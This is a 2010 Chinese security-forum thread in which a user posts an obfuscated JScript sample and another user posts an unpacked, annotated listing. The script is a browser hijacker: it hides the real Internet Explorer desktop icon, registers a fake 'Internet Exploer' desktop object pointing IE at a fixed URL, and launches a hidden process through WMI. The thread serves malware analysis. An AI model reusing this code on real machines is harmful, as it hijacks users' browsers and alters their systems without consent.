[讨论]都来看看这个流氓在干啥
发表于: 2010-10-31 20:13 7560

看了半天也没看出名堂来，懂这个的朋友说说看，这流氓在干啥：

//815465573

//___C:\Program Files\Internet Explorer\Iexplore.exe___
//____http://3144.net/?tt____

// Packed script in the widely seen "p,a,c,k,e,r" layout: the inner function
// replaces base-62 tokens in the first string argument with words from the
// '|'-separated dictionary (91 entries) and eval() then runs the rebuilt text.
// The rebuilt text uses WScript, ActiveXObject and GetObject, i.e. it targets
// Windows Script Host (JScript), not a browser page.
// For analysis, read the rebuilt text rather than executing it. It reads this
// very file (WScript.ScriptFullName) and pulls a program path and an argument
// out of the underscore-delimited marker comments placed above this statement,
// so those comment lines are input data for the script, not documentation.
eval(function(p,a,c,k,e,r){e=function(c){return(c<62?'':e(parseInt(c/62)))+((c=c%62)>35?String.fromCharCode(c+29):c.toString(36))};if('0'.replace(0,e)==0){while(c--)r[e(c)]=k[c];k=[function(e){return r[e]||e}];e=function(){return'([02-9dh-pr-zABF-OQ-Z]|1\\w)'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('0 n,o;WshShell=h i("9.6");0 y=p(){0 z=9.ScriptFullName;0 f=o.OpenTextFile(z,1);0 r=f.ReadAll();0 A=/B(.*?)B/F;0 G=/H(.*?)H/F;0 a=\'\',b=\'\';I(A.J(r)){a=K.$1;a=a.replace(/\\\\/g,"\\\\\\\\");0 _fkurl="";I(G.J(r)){b=K.$1;3{n.Run(\'"\'+a+\'" \'+b,1,false)}4(e){}}}};0 L=p(){n=h i(\'9.6\');o=h i(\'M.N\')};L();y();0 P=h i("9.6");0 q=h i("M.N");0 d=P.O("Templates");0 StartPath=P.O("AllUsersStartup");0 k=parseInt(Q.floor(Q.random()*9999));3{0 R="c:\\\\";0 OldPath=P.S;P.S=d;9.T(5000);q.CopyFile(R+"index.htm",d+"\\\\"+k);U(d+"\\\\"+k,d);9.T(60000);q.DeleteFile(d+"\\\\"+k)}4(E){};p U(V,W){0 X=12;0 Y=Z("11:{13=14}!\\\\\\\\.\\\\15\\\\16:win32_processstartup");0 s=Y.SpawnInstance_();s.ShowWindow=X;0 17="";0 18=Z("11:{13=14}!\\\\\\\\.\\\\15\\\\16:Win32_Process");18.Create(V,W,s,17)};0 2="{86AEFBE8-763F-0647-899C-A93278894D8E}";0 19="http://http://www.3144.net/?tt";3{P.5("1a\\\\1b\\\\t\\\\u\\\\v\\\\j\\\\1c\\\\NewStartPanel\\\\{1d-1e-1f-1g-1h}",1,"w")}4(e){};3{P.5("1a\\\\1b\\\\t\\\\u\\\\v\\\\j\\\\1c\\\\ClassicStartMenu\\\\{1d-1e-1f-1g-1h}",1,"w")}4(e){};3{P.5("7\\\\2\\\\"+2+"\\\\","l 1i","8")}4(e){};3{P.5("7\\\\2\\\\"+2+"\\\\DefaultIcon\\\\","C:\\\\1j 1k\\\\l j\\\\1l.m","8")}4(e){};3{P.5("7\\\\2\\\\"+2+"\\\\6\\\\","","8")}4(e){};3{P.5("7\\\\2\\\\"+2+"\\\\6\\\\D\\\\x\\\\","1m.m 1n.1o,1p 1q.1r","8")}4(e){};3{P.5("7\\\\2\\\\"+2+"\\\\6\\\\Open\\\\x\\\\","C:\\\\1j 1k\\\\l j\\\\1l.m "+19,"8")}4(e){};3{P.5("7\\\\2\\\\"+2+"\\\\6\\\\属性\\\\x\\\\","1m.m 1n.1o,1p 1q.1r","8")}4(e){};3{P.5("7\\\\2\\\\"+2+"\\\\1s\\\\1s","10","w")}4(e){};3{P.5("HKEY_LOCAL_MACHINE\\\\SOFTWARE\\\\t\\\\u\\\\v\\\\j\\\\Desktop\\\\NameSpace\\\\"+2+"\\\\","l 
1i","8")}4(e){};',[],91,'var||CLSID|try|catch|RegWrite|Shell|HKEY_CLASSES_ROOT|REG_SZ|WScript||||TempPath||||new|ActiveXObject|Explorer|_0|Internet|exe|_ws|_sf|function||fc|objConfig|Microsoft|Windows|CurrentVersion|REG_DWORD|Command|RunLnkFile|sfn|_o1|___||||ig|_o2|____|if|test|RegExp|Init|Scripting|FileSystemObject|SpecialFolders||Math|dhead|CurrentDirectory|Sleep|CreateWin32|_1|_2|HIDDEN_WINDOW|WMI|GetObject||winmgmts||impersonationLevel|impersonate|root|cimv2|intProcessID|objProcess|URL|HKEY_CURRENT_USER|Software|HideDesktopIcons|871C5380|42A0|1069|A2EA|08002B30309D|Exploer|Program|Files|Iexplore|Rundll32|Shell32|dll|Control_RunDLL|Inetcpl|cpl|ShellFolder'.split('|'),0,{}))
//815465573

最新回复 (5)
2
没人看出个名堂来哈?

2010-11-3 20:04
3
还不知道别人在干嘛就说别人是流氓。。。。。。。。无语啊。。。。。。。。。
2010-11-3 22:53
4
vbs病毒吧!
应该是个锁ie的vbs
2010-11-4 02:34
5
// Unpacked form of the eval() payload from the first post (Windows Script Host JScript).
// _ws and _sf are module-level handles that Init() later fills with a
// WScript.Shell and a Scripting.FileSystemObject instance.
var _ws,_sf;
// Implicit global; no later line of this listing reads WshShell.
WshShell=new ActiveXObject("WScript.Shell");
// RunLnkFile: reads the text of the running script file itself, extracts two
// values from underscore-delimited markers in it, and launches the first value
// as a program with the second as its argument.
// In the sample on this page the markers sit in comment lines above the packed
// eval() and hold an Internet Explorer path and a URL, so the launch target is
// configured by editing those comments rather than the code.
var RunLnkFile=function()
{
  // Full path of the script currently being run by Windows Script Host.
  var sfn=WScript.ScriptFullName;
  // Mode 1 = open for reading; the whole file is loaded into fc.
  var f=_sf.OpenTextFile(sfn,1);
  var fc=f.ReadAll();
  // _o1 captures text between three-underscore markers, _o2 between
  // four-underscore markers (both non-greedy, case-insensitive, global).
  var _o1=/___(.*?)___/ig;
  var _o2=/____(.*?)____/ig;
  var a='',b='';
  if(_o1.test(fc))
  {
    // RegExp.$1 is the capture group of the most recent successful match.
    a=RegExp.$1;
    // Doubles every backslash in the captured value.
    a=a.replace(/\\/g,"\\\\");
    // Never read anywhere in this listing.
    var _fkurl="";
    if(_o2.test(fc))
    {
      b=RegExp.$1;
      try
      {
        // Runs '"<a>"  <b>' with window style 1 and without waiting for exit.
        _ws.Run('"'+a+'"  '+b,1,false)
      }
      catch(e)
      {
        // Launch failures are discarded silently.
         
      }
       
    }
     
  }
   
}
// Init: creates the two COM automation objects used by RunLnkFile and stores
// them in the module-level variables _ws (shell) and _sf (file system).
;var Init=function()
{
  _ws=new ActiveXObject('WScript.Shell');
  _sf=new ActiveXObject('Scripting.FileSystemObject')
}
// Main sequence: initialise the COM handles, launch the program named by the
// marker comments, then copy c:\index.htm into the Templates folder under a
// random numeric name, start that copy through WMI, wait, and delete the copy.
;Init();
RunLnkFile();
// Second pair of shell / file-system objects, separate from _ws and _sf.
var P=new ActiveXObject("WScript.Shell");
var q=new ActiveXObject("Scripting.FileSystemObject");
var TempPath=P.SpecialFolders("Templates");
// Resolved but not used again in this listing.
var StartPath=P.SpecialFolders("AllUsersStartup");
// Integer in the range 0..9998, used as an extension-less file name.
var _0=parseInt(Math.floor(Math.random()*9999));
try
{
  var dhead="c:\\";
  // Saved but never restored in this listing.
  var OldPath=P.CurrentDirectory;
  P.CurrentDirectory=TempPath;
  WScript.Sleep(5000);
  // Copies c:\index.htm to <Templates>\<number>; throws if the source is
  // missing, in which case the empty catch below skips the rest of the block.
  q.CopyFile(dhead+"index.htm",TempPath+"\\"+_0);
  // The copied file path is passed as the command line, Templates as the
  // working directory.
  CreateWin32(TempPath+"\\"+_0,TempPath);
  // Waits 60 seconds, then removes the temporary copy.
  WScript.Sleep(60000);
  q.DeleteFile(TempPath+"\\"+_0)
}
catch(E)
{
  // Every failure in the sequence above is discarded silently.
   
}
// CreateWin32(_1, _2): starts a process through WMI (Win32_Process.Create) with
// _1 as the command line and _2 as the working directory, using a startup
// configuration whose ShowWindow is set to 12 (named HIDDEN_WINDOW here).
// NOTE(review): a process started this way is presumably created by the WMI
// service rather than as a child of the script host; keep that in mind when
// reading process-tree telemetry for this sample.
// The two GetObject monikers are single string literals in the packed original;
// the line breaks around the braces below come from the formatter that produced
// this listing, so the function does not parse as printed.
;function CreateWin32(_1,_2)
{
  var HIDDEN_WINDOW=12;
  var WMI=GetObject("winmgmts:
  {
    impersonationLevel=impersonate
  }
  !\\\\.\\root\\cimv2:win32_processstartup");
  // New Win32_ProcessStartup instance carrying the window setting.
  var objConfig=WMI.SpawnInstance_();
  objConfig.ShowWindow=HIDDEN_WINDOW;
  // Passed in the process-id position of Create; its value is not read afterwards.
  var intProcessID="";
  var objProcess=GetObject("winmgmts:
  {
    impersonationLevel=impersonate
  }
  !\\\\.\\root\\cimv2:Win32_Process");
  // The return code of Create is ignored.
  objProcess.Create(_1,_2,objConfig,intProcessID)
}
// Registry section: hides one desktop icon by CLSID and registers a new shell
// object under a different CLSID whose Open verb starts Internet Explorer on a
// fixed URL. For triage, the keys and values written below are the artefacts to
// look for on an affected host. Every write sits in its own try/catch with an
// empty handler, so a write that fails (for example for lack of rights on
// HKEY_CLASSES_ROOT or HKEY_LOCAL_MACHINE) is skipped without any trace.
// String literals that contain braces are split across lines in this listing
// (formatter artefact); in the packed original each is a single literal.
// CLSID of the shell object this script registers.
;var CLSID="
{
  86AEFBE8-763F-0647-899C-A93278894D8E
}
";
// Note the doubled scheme; reproduced exactly as written in the sample.
var URL="http://http://www.3144.net/?tt";
// Sets HideDesktopIcons\NewStartPanel\{871C5380-...} = 1 (REG_DWORD) for the
// current user. NOTE(review): that CLSID is commonly documented as the built-in
// Internet Explorer desktop icon - confirm before relying on it.
try
{
  P.RegWrite("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\HideDesktopIcons\\NewStartPanel\\
  {
    871C5380-42A0-1069-A2EA-08002B30309D
  }
  ",1,"REG_DWORD")
}
catch(e)
{
   
}
// Same value under ClassicStartMenu.
;try
{
  P.RegWrite("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\HideDesktopIcons\\ClassicStartMenu\\
  {
    871C5380-42A0-1069-A2EA-08002B30309D
  }
  ",1,"REG_DWORD")
}
catch(e)
{
   
}
// Default value of the new CLSID key: display name "Internet Exploer"
// (misspelled in the sample, which makes it a usable search string).
;try
{
  P.RegWrite("HKEY_CLASSES_ROOT\\CLSID\\"+CLSID+"\\","Internet Exploer","REG_SZ")
}
catch(e)
{
   
}
// Icon is taken from the real Iexplore.exe.
;try
{
  P.RegWrite("HKEY_CLASSES_ROOT\\CLSID\\"+CLSID+"\\DefaultIcon\\","C:\\Program Files\\Internet Explorer\\Iexplore.exe","REG_SZ")
}
catch(e)
{
   
}
// Creates the Shell key with an empty default value.
;try
{
  P.RegWrite("HKEY_CLASSES_ROOT\\CLSID\\"+CLSID+"\\Shell\\","","REG_SZ")
}
catch(e)
{
   
}
// Verb "D": opens the Internet Options control panel (Inetcpl.cpl).
;try
{
  P.RegWrite("HKEY_CLASSES_ROOT\\CLSID\\"+CLSID+"\\Shell\\D\\Command\\","Rundll32.exe Shell32.dll,Control_RunDLL Inetcpl.cpl","REG_SZ")
}
catch(e)
{
   
}
// Verb "Open": starts Iexplore.exe with the fixed URL as its argument.
;try
{
  P.RegWrite("HKEY_CLASSES_ROOT\\CLSID\\"+CLSID+"\\Shell\\Open\\Command\\","C:\\Program Files\\Internet Explorer\\Iexplore.exe "+URL,"REG_SZ")
}
catch(e)
{
   
}
// The verb name in this key path is garbled in this listing; the packed original
// in the first post has a Chinese verb name (the word for "Properties") here.
// It runs the same Internet Options command as verb "D".
;try
{
  P.RegWrite("HKEY_CLASSES_ROOT\\CLSID\\"+CLSID+"\\Shell\\^'\\Command\\","Rundll32.exe Shell32.dll,Control_RunDLL Inetcpl.cpl","REG_SZ")
}
catch(e)
{
   
}
// Writes the value named ShellFolder under the ShellFolder key as REG_DWORD "10".
;try
{
  P.RegWrite("HKEY_CLASSES_ROOT\\CLSID\\"+CLSID+"\\ShellFolder\\ShellFolder","10","REG_DWORD")
}
catch(e)
{
   
}
// Adds the CLSID under the machine-wide Desktop\NameSpace key, which is where
// shell objects shown on the desktop are listed.
;try
{
  P.RegWrite("HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop\\NameSpace\\"+CLSID+"\\","Internet Exploer","REG_SZ")
}
catch(e)
{
   
}
;
2010-11-4 05:47
6
谢谢,这样看就清楚多了。
2010-11-4 18:45